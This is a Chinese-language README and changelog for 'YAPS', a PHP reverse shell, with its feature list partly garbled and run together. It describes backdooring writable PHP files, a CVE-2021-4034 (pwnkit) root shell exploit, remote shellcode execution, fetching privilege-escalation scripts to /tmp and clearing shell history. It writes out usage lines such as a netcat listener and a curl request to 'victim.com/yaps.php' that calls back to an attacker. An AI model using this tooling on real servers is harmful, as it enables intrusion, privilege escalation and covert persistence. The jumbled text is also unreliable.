Yet Another PHP Shell - 最完整的PHP反弹Shell

是的,正如其名,这是又一个PHP反向Shell,是市面上数百个同类工具之一,但拥有一些优势。它是一个单一的PHP文件,包含所有功能,你可以通过一个简单的TCP监听器(例如 nc -lp 1337)进行控制。
在当前版本(1.5)中,其主要功能仅支持Linux系统,但我计划使其也适用于Windows。
目前它处于第一版,我尚未进行大量测试,并且我还有很多事情打算在后续版本中完成和改进(尚未完成!),因此如果你发现任何bug或有功能改进的建议,请告知我。=)
!interactive 生成交互式Shell)
rlwrap nc -lp <ip> <port>)curl -x POST -d "x=ip:port" victim.com/yaps.php);yaps.php?s 或 yaps.php?silent 来隐藏横幅php yaps.php ip port!help - 显示帮助菜单!all-colors - 切换所有颜色(兼容无颜色的TTY)!color - 切换PS1颜色(仅本地,不修改环境变量)!duplicate - 生成另一个YAPS连接!enum - 将LinPEAS和LinEnum下载到/tmp并使其就绪!info - 列出目标信息(上述提及的信息收集)!infect - 用后门感染可写的PHP文件!interactive - 在其他端口上生成交互式反向Shell(可与sudo、su、mysql等配合使用)!passwd - 密码选项(启用、禁用、设置、修改)!php - 在远程主机上编写并运行PHP代码!pwnkit - 尝试利用CVE-2021-4034并生成root反向Shell!shellcode - 在远程主机上发送并运行Shellcode





v1.5 - 2022年2月12日
!shellcode:接收并运行任意Shellcodeduplicate() 函数(现在可以指定端口范围)stabilize 改为 interactivev1.4 - 2022年2月4日
!pwnkit:利用CVE-2021-4034并生成root反向Shellverify_update() 函数v1.3.1 - 2021年8月1日
v1.3 - 2021年7月28日
!infect:用后门感染PHP文件!stabilize 的payload(修复了bug)v1.2.2 - 2021年7月18日
v1.2.1 - 2021年7月17日
v1.2 - 2021年7月17日
!duplicate:生成另一个Shell--update|-u)--help|-h)php yaps.php ip port)v1.1 - 2021年7月12日
!all-colors:切换终端颜色,适用于无颜色的TTYexit 命令:关闭套接字(退出Shell)!stabilize 中的payload:取消设置HISTSIZE和HISTFILE!info 中获取CPU和内存信息的方法v1.0.1 - 2021年7月8日
[x,y,z] 改为 array(x,y,z),以提高与旧版PHP的兼容性部分灵感来源于以下工具:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell
!suggester - 将Linux Exploit Suggester下载到/tmp并使其就绪

